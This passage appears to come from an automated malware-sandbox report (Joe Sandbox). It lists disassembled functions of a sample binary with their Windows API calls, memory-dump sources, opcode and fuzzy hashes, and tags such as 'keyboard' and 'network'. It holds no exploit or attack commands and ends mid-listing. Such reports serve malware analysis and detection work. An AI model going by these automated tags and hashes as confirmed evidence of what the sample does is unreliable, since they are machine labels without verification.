                          • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                          • Instruction ID: b7497f6ac228ad53f0c959a8cc79513a6636586b54f5d1791ebb5930b0fa24ca
                          • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                          • Instruction Fuzzy Hash: 7901D132210225ABCB249F2DD8929AB77E9EFC5714718806EF90ACB245D631EA02C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                          • Instruction ID: 8a19dfb41a33d3bb56e93898e4cf1fc4bf90c515a721f240866552f4b99d102b
                          • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                          • Instruction Fuzzy Hash: 2301F9722107056ED3249B38D807B66BFE8DF44760F508A6EF95ECB1D1EB71E4408B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1F2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                          • Instruction ID: 5370d0323685cea82df5441165ae4844626f2a81ba6f9a33290b164400427f8d
                          • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                          • Instruction Fuzzy Hash: DE012B30008602EBCB246F28E841DAA7BE8DF81320B5485BDF8A843291D7319891C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B05116 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00B05A39,?,?,?,-00000003,00000000,00000000), ref: 00B0514E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID:
                          • API String ID: 3964851224-0
                          • Opcode ID: d16992c84e426c966ed3627f66c750f6bd191afc1e03672a0ecec9dd69b3ab7e
                          • Instruction ID: 919cfaac3eaa7ba5b66ae5a56f14124edf9f37b0a1ef632fcce1b51714fdec49
                          • Opcode Fuzzy Hash: d16992c84e426c966ed3627f66c750f6bd191afc1e03672a0ecec9dd69b3ab7e
                          • Instruction Fuzzy Hash: 61F0C279200A25AFC7216B54D800B2BFFE9EF40B61F008269F54966AD0CB709820CBC4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B595AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00B595C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: 611e5fefa875540437949ba625b031c7dcfc39161b20dce5a49a309102803958
                          • Instruction ID: d34c2f46258813b511440e2cfa3847078a4b25855fd374738784b7ed754d35d8
                          • Opcode Fuzzy Hash: 611e5fefa875540437949ba625b031c7dcfc39161b20dce5a49a309102803958
                          • Instruction Fuzzy Hash: AFE065776042146BC310EA64DC45EABB799BF85720F14875ABDB4872C1DA30DD14C7D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B03E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,?,?,?,?,00B034E2,?,00000001), ref: 00B03E6D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: b4e8dbd207b032febf319cfe440df15f868a8ad7bb467aad6a047ea89ec107ec
                          • Instruction ID: fb6c7edfcd7559d522cd06aa2a011447659f536d3d01f05bdad19e5c653b6bc8
                          • Opcode Fuzzy Hash: b4e8dbd207b032febf319cfe440df15f868a8ad7bb467aad6a047ea89ec107ec
                          • Instruction Fuzzy Hash: 7EF03971501751CFCB349F65D898812BBE8EF04B153248ABEE1D6836A1C7319984DF20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B479F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00B47A11
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FolderPath_memmove
                          • String ID:
                          • API String ID: 3334745507-0
                          • Opcode ID: c3f56ffb3da090cebcd7716108d1c07336a6e6fe4e1fb57a9ec0d804eaa48d32
                          • Instruction ID: 682c42433937f84b4e3228cf9b7e6dac96b613f0d95d8423626835077a97a2b5
                          • Opcode Fuzzy Hash: c3f56ffb3da090cebcd7716108d1c07336a6e6fe4e1fb57a9ec0d804eaa48d32
                          • Instruction Fuzzy Hash: 1FD05EA66002282FDB50E6249C09DFB76ADC744144F0002E1786DD2192ED20AE4587E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B050EC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • FindCloseChangeNotification.KERNEL32(?,?,?,00B75950), ref: 00B0510C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 9a1ef020ee95efed2399985bf4912c02c3e12d384e5a37e6dd41f9b75306da92
                          • Instruction ID: 61d10240895eb03eadd0cb1043d646b94affa6c847e5bb9b59e0cf0d60172459
                          • Opcode Fuzzy Hash: 9a1ef020ee95efed2399985bf4912c02c3e12d384e5a37e6dd41f9b75306da92
                          • Instruction Fuzzy Hash: D1E09275400A02CBC2315F1AA804417FBE5EEE13613218A6FD0E592AA0DBB15886DF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B46852 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B46623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00B4685E,?,?,?,00B74A5C,00B9E448,00000003,?,?), ref: 00B466E2
                          • WriteFile.KERNEL32(?,?,00BC22E8,00000000,00000000,?,?,?,00B74A5C,00B9E448,00000003,?,?,00B04C44,?,?), ref: 00B4686C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$PointerWrite
                          • String ID:
                          • API String ID: 539440098-0
                          • Opcode ID: 056b9d5aa9950ef8ce8ddad1aa844a3de554c3d1086e23f032daa3ba8d7eb3ea
                          • Instruction ID: 2107975da066652f44e9926b1287dbaa91d6b0687b3160ccd888bc4ff48ad415
                          • Opcode Fuzzy Hash: 056b9d5aa9950ef8ce8ddad1aa844a3de554c3d1086e23f032daa3ba8d7eb3ea
                          • Instruction Fuzzy Hash: 30E04636000208BBDB20AF94D805FCABBB8EF04310F00051AF941A2050D7B1AB14DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B01952
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSendTimeout
                          • String ID:
                          • API String ID: 1599653421-0
                          • Opcode ID: f2ccacf4220798cca5c7b73dbbfc894d50058981d5ad4f8ee4d225f569ef33ed
                          • Instruction ID: f0cb1643261655ff3e9a14c53e3ca59b9dd29ea08067c5287fb9cfdfbad2000d
                          • Opcode Fuzzy Hash: f2ccacf4220798cca5c7b73dbbfc894d50058981d5ad4f8ee4d225f569ef33ed
                          • Instruction Fuzzy Hash: 82D012F169020C7EFB008761CD07DBB776CD721F81F0046617E06D64D1DA64DE098670
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3E390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B01952
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B3E3AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID:
                          • API String ID: 1777923405-0
                          • Opcode ID: f59c913557bbef9c7ef762785e53661b19bbf6e6845d12fea20f7dac67ea47e0
                          • Instruction ID: 91f79989959c0958ec15083ab3d95dae190e5d1bcae9068e666b3ecc0a4cdd5d
                          • Opcode Fuzzy Hash: f59c913557bbef9c7ef762785e53661b19bbf6e6845d12fea20f7dac67ea47e0
                          • Instruction Fuzzy Hash: 75D01231144110AAFA716B18FC06FC17BD2DB41750F21089AB580670E5D6D25C519644
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B56FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID:
                          • API String ID: 530164218-0
                          • Opcode ID: 1eed811faab349719bdf7891ffa48ab4cf3f3eca5f67281fd63c77e6ab5711ac
                          • Instruction ID: 042a7e98abcb964949489ba2947cfaba8a64895f3093a48d2e348edb17dacdef
                          • Opcode Fuzzy Hash: 1eed811faab349719bdf7891ffa48ab4cf3f3eca5f67281fd63c77e6ab5711ac
                          • Instruction Fuzzy Hash: 2AD067362105149F8701EB99D844C897BE9FF5D6103058492F5499B271DA21ED509B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B04FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00B749DA,?,?,00000000), ref: 00B04FC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 519bbc9c4400e77ba5ceafd26741f866efe732d2515b362fc8f2a8fd22d2bb94
                          • Instruction ID: 69e6b526b07df07a86f8e152100909f4ac8b6bf0d9e8f9242d8dab602f3c213f
                          • Opcode Fuzzy Hash: 519bbc9c4400e77ba5ceafd26741f866efe732d2515b362fc8f2a8fd22d2bb94
                          • Instruction Fuzzy Hash: 68D0C974640208BFEB00DB91DC4AF9A7BBCEB04718F600194F600A62E0D6F2BE408B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 00B6F5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00B6F64E
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B6F6AD
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6F6EA
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6F711
                          • SendMessageW.USER32 ref: 00B6F737
                          • _wcsncpy.LIBCMT ref: 00B6F7A3
                          • GetKeyState.USER32(00000011), ref: 00B6F7C4
                          • GetKeyState.USER32(00000009), ref: 00B6F7D1
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B6F7E7
                          • GetKeyState.USER32(00000010), ref: 00B6F7F1
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6F820
                          • SendMessageW.USER32 ref: 00B6F843
                          • SendMessageW.USER32(?,00001030,?,00B6DE69), ref: 00B6F940
                          • SetCapture.USER32(?), ref: 00B6F970
                          • ClientToScreen.USER32(?,?), ref: 00B6F9D4
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00B6F9FA
                          • ReleaseCapture.USER32 ref: 00B6FA05
                          • GetCursorPos.USER32(?), ref: 00B6FA3A
                          • ScreenToClient.USER32(?,?), ref: 00B6FA47
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B6FAA9
                          • SendMessageW.USER32 ref: 00B6FAD3
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B6FB12
                          • SendMessageW.USER32 ref: 00B6FB3D
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B6FB55
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B6FB60
                          • GetCursorPos.USER32(?), ref: 00B6FB81
                          • ScreenToClient.USER32(?,?), ref: 00B6FB8E
                          • GetParent.USER32(?), ref: 00B6FBAA
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B6FC10
                          • SendMessageW.USER32 ref: 00B6FC40
                          • ClientToScreen.USER32(?,?), ref: 00B6FC96
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B6FCC2
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B6FCEA
                          • SendMessageW.USER32 ref: 00B6FD0D
                          • ClientToScreen.USER32(?,?), ref: 00B6FD57
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B6FD87
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6FE1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 3461372671-4164748364
                          • Opcode ID: f1238d591dc2eb7a62bbbe177280595f1671571e47d7c7379867ad6f5b4a0488
                          • Instruction ID: 5e58f5c74488cca5206938a8a13501dd0ee322d7083984e9af1a316495e681f0
                          • Opcode Fuzzy Hash: f1238d591dc2eb7a62bbbe177280595f1671571e47d7c7379867ad6f5b4a0488
                          • Instruction Fuzzy Hash: D632EE71604206AFDB20DF68D884EBABBE5FF49318F144AA9F655872B1DB35EC00CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B6AFDB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: %d/%02d/%02d
                          • API String ID: 3850602802-328681919
                          • Opcode ID: a9878a4aa89e90ffb39a9fe89287ce7ef5252fa4fa3057ccd89a28a7f355a371
                          • Instruction ID: 4db5b72190491bc1c8c1e8134c9ae0b138831c78237afd0e0b2c591e710315fb
                          • Opcode Fuzzy Hash: a9878a4aa89e90ffb39a9fe89287ce7ef5252fa4fa3057ccd89a28a7f355a371
                          • Instruction Fuzzy Hash: 91129D71500218ABEF259F64DC89FAA7BE8FB45310F14429AF519EB2E1DB788941CF12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000), ref: 00B1F796
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B74388
                          • IsIconic.USER32(000000FF), ref: 00B74391
                          • ShowWindow.USER32(000000FF,00000009), ref: 00B7439E
                          • SetForegroundWindow.USER32(000000FF), ref: 00B743A8
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B743BE
